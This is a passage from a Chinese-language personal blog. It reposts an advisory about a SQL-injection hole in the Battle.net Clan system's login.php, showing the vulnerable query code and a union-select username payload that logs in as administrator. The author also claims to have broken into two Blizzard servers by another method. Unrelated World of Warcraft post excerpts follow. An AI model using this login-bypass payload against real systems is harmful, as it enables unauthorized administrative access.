**:cnfjhh's blog
battle.net clan管理系統使用mysql後端,允許使用者方便的公升級和維護web站點。
系統實現上存在輸入驗證漏洞,遠端攻擊者可能利用此漏洞執行sql注入攻擊,非授權獲取系統的管理許可權。
battle.net clan的login.php指令碼沒有正確地驗證通過index.php對user引數的輸入:
line 9 --> $user = $_post['user'];
line 10--> $pass = $_post['pass'];
.....
.....
.....
line 21--> mysql_query("select * from bcs_members where name='$user' and password='$pass'", $link);
允許攻擊者以管理員許可權登入。但成功攻擊要求禁用了magic_quotes_gpc。
username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
注:sourceforge上發布的這個和我12月份拿到暴雪某兩個負載時候的方法不同,他們是今年4月多發現的
魔獸世界 法師
代刷stsm巨集 showtooltip nopet 召喚水元素 pet 冰凍術 cast nopet 召喚水元素 pet 冰凍術 stopmacro nopet petstay petpassive 奧法天賦 奧法輸出巨集 火法輸出巨集 奧法輸出天賦設定 pve 職業輸出通略 80 奧法精華帖 附...
魔獸世界 裝備
在上次編寫的基礎上自己編寫 include include include include using namespace std define warrior num 5 class cheadquarter class cwarrior class cheadquarter cwarrior c...
《魔獸世界》室外光照
魔獸世界 室外光照 光照在魔獸世界豐富多彩的場景表現上起著畫龍點睛的作用,那些恰如其分的色彩,將整個世界烘染成特點鮮明的大小區域,讓人過目難忘。這些區域性的用色方案,被儲存在遊戲的光照列表中。實際上,它不僅僅包括光照顏色,還包括了霧 天空 陰影 水體明暗 太陽光暈等諸多顏色。下面是位於晶歌森林時的截...